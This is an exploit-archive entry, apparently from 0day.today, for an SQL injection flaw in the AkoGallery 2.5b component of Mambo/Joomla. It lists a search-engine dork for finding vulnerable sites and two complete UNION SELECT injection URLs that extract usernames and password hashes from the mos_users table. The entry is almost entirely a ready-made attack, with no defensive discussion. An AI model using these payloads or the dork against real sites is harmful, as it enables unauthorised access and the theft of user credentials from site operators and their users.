id: 2580
date: 01/31/2008
title: Mambo Component AkoGallery 2.5b SQL Injection Vulnerability
author: S@BUN
cves: 

===========================================================
Mambo Component AkoGallery 2.5b SQL Injection Vulnerability
===========================================================




#########################################################################
#
#
#  joomla SQL Injection(com_akogallery)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_akogallery"
#
########################################################################
EXPLOIT :

index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

#########################################################################



#  0day.today [2023-03-21]  #